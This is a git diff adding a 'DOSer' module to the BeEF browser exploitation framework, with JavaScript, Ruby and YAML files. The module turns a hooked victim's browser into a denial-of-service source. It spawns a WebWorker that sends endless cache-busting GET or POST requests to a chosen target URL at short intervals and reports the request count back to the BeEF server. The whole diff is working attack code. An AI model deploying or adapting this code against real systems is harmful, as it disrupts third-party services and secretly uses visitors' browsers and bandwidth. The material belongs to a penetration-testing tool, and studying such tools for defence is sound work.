diff --git a/modules/network/DOSer/command.js b/modules/network/DOSer/command.js new file mode 100644 index 000000000..bac612bd1 --- /dev/null +++ b/modules/network/DOSer/command.js @@ -0,0 +1,33 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + var url = '<%= @url %>'; + var delay = '<%= @delay %>'; + var method = '<%= @method %>'; + var post_data = '<%= @post_data %>'; + + if(!!window.Worker){ + var myWorker = new Worker('http://' + beef.net.host + ':' + beef.net.port + '/worker.js'); + + myWorker.onmessage = function (oEvent) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, oEvent.data); + }; + + var data = {}; + data['url'] = url; + data['delay'] = delay; + data['method'] = method; + data['post_data'] = post_data; + + myWorker.postMessage(data); + }else{ + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Error: WebWorkers are not supported on this browser.'); + } + + +}); diff --git a/modules/network/DOSer/config.yaml b/modules/network/DOSer/config.yaml new file mode 100644 index 000000000..553f3f934 --- /dev/null +++ b/modules/network/DOSer/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + doser: + enable: true + category: "Network" + name: "DOSer" + description: "Do infinite GET or POST requests to a target, spawning a WebWorker in order to don't slow down the hooked page. If the browser doesn't support WebWorkers, the module will not run." + authors: ["antisnatchor"] + target: + working: ["ALL"] diff --git a/modules/network/DOSer/module.rb b/modules/network/DOSer/module.rb new file mode 100644 index 000000000..625a98151 --- /dev/null +++ b/modules/network/DOSer/module.rb @@ -0,0 +1,26 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Doser < BeEF::Core::Command + + def pre_send + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/network/doser/worker.js', '/worker', 'js') + end + + def self.options + return [ + {'name' => 'url', 'ui_label' => 'URL', 'value' => 'http://target/path'}, + {'name'=>'delay', 'ui_label' =>'Delay between requests (ms)','value'=>'10'}, + {'name'=>'method', 'ui_label' =>'HTTP Method','value'=>'POST'}, + {'name'=>'post_data', 'ui_label' =>'POST data','value'=>'key=value&&Aa=Aa&BB'} + ] + end + + def post_execute + return if @datastore['result'].nil? + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/network/DOSer/worker.js b/modules/network/DOSer/worker.js new file mode 100644 index 000000000..70a0db010 --- /dev/null +++ b/modules/network/DOSer/worker.js @@ -0,0 +1,45 @@ +var url = ""; +var delay = 0; +var method = ""; +var post_data = ""; +var counter = 0; + +onmessage = function (oEvent) { + url = oEvent.data['url']; + delay = oEvent.data['delay']; + method = oEvent.data['method']; + post_data = oEvent.data['post_data']; + doRequest(); +}; + +function noCache(u){ + var result = ""; + if(u.indexOf("?") > 0){ + result = "&" + Date.now() + Math.random(); + }else{ + result = "?" + Date.now() + Math.random(); + } + return result; +} + +function doRequest(){ + setInterval(function(){ + + var xhr = new XMLHttpRequest(); + xhr.open(method, url + noCache(url)); + xhr.setRequestHeader('Accept','*/*'); + xhr.setRequestHeader("Accept-Language", "en"); + if(method == "POST"){ + xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); + xhr.send(post_data); + }else{ + xhr.send(null); + } + counter++; + + },delay); + + setInterval(function(){ + postMessage("Requests sent: " + counter); + },10000); +} \ No newline at end of file